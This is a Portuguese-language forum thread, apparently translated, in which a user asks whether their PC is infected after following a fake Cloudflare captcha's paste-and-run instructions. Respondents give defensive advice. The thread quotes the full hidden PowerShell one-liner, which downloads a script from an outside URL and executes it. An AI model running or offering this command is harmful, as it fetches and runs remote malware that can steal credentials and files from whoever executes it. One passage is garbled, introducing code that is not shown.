Golpistas espalharam links fraudulentos no GitHub que levavam a uma página falsa de captcha da Cloudflare, e a página me instruiu a pressionar as teclas ⊞ Win+ R, Ctrl+ Ve, em seguida, pressionar Enter. Segui as instruções, mas nada aconteceu.
Percebi que era um golpe momentos depois. Como sei se meu computador está infectado com algum vírus do golpe?
O código de golpe de uma linha que me instruíram a colar é o seguinte. Um usuário comentou abaixo sugerindo dividir o código em duas linhas aqui para evitar que alguém o usasse por engano.
powershell
-WindowStyle Hidden -Command ([ScriptBlock]::Create((irm https://jaihind.edu.in/weatherdolphin/dollrandom))).Invoke(); Write-Host " Cloudflare. inc. Captcha-ID:1488 ";```
Para descobrir se o seu PC foi infectado, instale um antivírus/detector de malware confiável e execute-o. Existem muitas versões gratuitas disponíveis.
Eu uso o MalwareBytes no Windows e o Kaspersky nos meus celulares.
Em primeiro lugar, nunca faça nada fora do navegador se um site solicitar, se você não souber exatamente o que está fazendo. Especialmente empresas antiabuso de boa reputação como a Cloudflare jamais solicitariam a execução de qualquer tipo de comando CLI. Ela só precisa saber seu endereço IP e várias partes da impressão digital do navegador para utilizar plenamente suas funcionalidades. Isso foi muito descuidado .
Em segundo lugar, o script tenta carregar algum código no domínio de aplicativo do Windows . O código é:
Então, obviamente, o invasor sabe o que está fazendo, enquanto as páginas da web com os arquivos estão online e ainda hospedam os arquivos. Você definitivamente deve presumir que foi infectado .
Em terceiro lugar, você não pode detectá-lo sem saber exatamente o que ele faz . Pode até ser um vírus de uso único — por exemplo, um que verifica seus arquivos em busca de dados importantes, como senhas/contas, e-mails, carteiras de criptomoedas ou qualquer outra coisa, e depois se autodeleta após terminar — uma verificação com qualquer antivírus/antimalware é inútil nesse caso.
Caso contrário, ele pode ser indetectável por antivírus, que só sabem o que as pessoas dizem para eles saberem, e algoritmos heurísticos também não conseguem detectar tudo.
Se a máquina for importante, pode ser necessário/recomendado entrar em contato com um especialista em segurança. Ou pelo menos alguém que possa lhe dizer exatamente o que aconteceu com a sua máquina quando o script foi executado — isso é muito mais confiável do que executar uma varredura com aplicativos aleatórios.